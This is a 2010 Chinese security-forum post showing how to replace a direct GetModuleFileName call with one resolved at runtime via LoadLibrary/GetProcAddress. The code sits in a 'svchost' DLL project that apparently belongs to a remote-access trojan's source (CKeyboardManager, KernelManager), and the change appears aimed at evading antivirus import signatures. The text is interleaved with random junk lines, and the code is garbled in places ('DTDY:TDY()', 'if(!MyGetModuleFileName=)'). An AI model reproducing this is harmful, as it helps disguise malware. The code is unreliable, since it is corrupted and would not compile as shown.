标题:
[原创文章]
全局动态调用
[打印本页]
作者:
ice_xke
时间:
2010-10-19 12:30
标题:
全局动态调用
全局动态调用笔记
; E% V' C) \4 {9 R" v& F
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
! [; r4 U8 R% s# x# W
----------------------------------------
1 k4 R F5 a- F
DTDY.h:
7 a4 F+ y) `$ r- L1 M2 }
. c- [% w# y% b
#if _MSC_VER>1000
4 A0 V9 `; ?/ m1 |2 y( C/ j n
#pragma once
' f" }& L7 {: m- R
#endif //_MSC_VER>1000
3 }, E% {( y7 L9 p
#include<windows.h>
F- ]4 A& v2 B0 u' V! ^+ V
n! W4 s3 t8 Y" s3 k/ }' W8 j
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
+ V: Y' f" G; K
class DTDY
$ c7 d! ]# p a: y4 S3 E6 _
{
' t \) }4 R- h) U" ]: N
public:
$ J( R. F& R3 h
DTDY();
: x3 x9 d4 D2 _: |& B! O3 y/ P
virtual ~DTDY();
6 Q1 o! _, u2 {
public:
1 s7 ^/ p) z4 F: K) X5 m
static pGetModuleFileNameA MyGetModuleFileName;
: u: p4 I; q% q7 T# B( T
static BOOL FunInitiallization();
/ F, D# ~2 L; L
};
W( F# B1 f6 d$ ^
#endif
' l/ [9 I( P& L/ `( { `
----------------------------------------
) W- G) Q8 L9 W5 h2 L
4 h/ W9 F: V) M2 O3 D. w; [# h
DTDY.cpp:
3 v" u; F3 C' I
8 v7 ?6 C% d8 z
#include "DTDY.h"
# K( l+ S: Z7 C; `& u9 [4 P
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
5 x" T$ i: v0 e$ i( d
DTDY:TDY()
: P- v( P G- z
{
8 W0 _8 l2 {5 e7 X
}
6 [# s2 B) p$ ^ s& V
DTDY::~DTDY()
8 o- m; Z* ~: |: l; S7 Y
{
' ]4 q4 O4 G- z+ I$ i5 [
}
8 `& j! N8 {) L) r2 ]& n' Y) W
BOOL DTDY::FunInitiallization()
5 I6 z$ i, \3 D4 g# c( |2 A
{
! f0 Y: `6 d4 c1 ]) Z
HMODULE hModule=LoadLibrary("kernel32.dll");
S; n% F7 T3 z: E; E* K3 j
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
) h A8 c) @$ K, }3 H2 o+ l3 z
if(!MyGetModuleFileName=) return FALSE;
* J$ _3 N- l- Z, `$ z& b
% q8 }( s' g2 j! F) U
return TRUE;
; a9 O1 g" o4 w, i5 ?4 }& `
}
8 M0 a% Q) S. U1 M$ o; ?
----------------------------------------
8 t( D& x* T1 c) G$ {1 [
svchost.cpp:
; I. h0 s. f/ Q8 D+ {
; \2 X6 G& P/ y
#include "DTDY.h"
9 {$ l3 ?4 g, o4 @1 n* x
+ W# I5 y2 D0 Y' Q
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
) p% R1 e* Q/ h
{
( C( H, Z4 B, Q- z# ?& x
switch(ul_reason_for_call)
3 D3 G9 E; K6 B4 f
{
$ s: g' W/ D1 e! X
case DLL_PROCESS_ATTACH:
, O: H! V" |+ ~
if(!DTDY::FunInitiallization()) return FALSE;
# W1 g- I! E: k. A$ e/ r* A/ U0 f
+ f0 v% ^# q1 r H* O8 G
break;
% o: W2 `8 l" R% H+ G. b( z
}
, p7 v, p. Y) w" W- R7 s
}
/ ^& t0 C$ ^& z3 }( {, M4 r% {! r
# Q" q# p8 x4 Q" }1 K* c
1 S4 p3 e2 N4 I
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
/ I: \% |4 V& w$ e$ j4 E
改写为
% G# c0 k1 b- p) e: D' z
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
# w+ {: W" f* T E
----------------------------------------
' P7 T [+ }! i
KernelManager.cpp:
. m# N! H: C: c" [' m& v+ n& T
2 m( N" g9 X/ D) y
#include "../DTDY.h"
( Z6 U# e5 `1 i* T. t3 k4 Q
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
7 M7 s8 j. k% b% O
改写为
2 o1 M7 B9 o4 r5 o% [4 S
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
# Z3 _# d0 i' Z' d w" e
----------------------------------------
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2
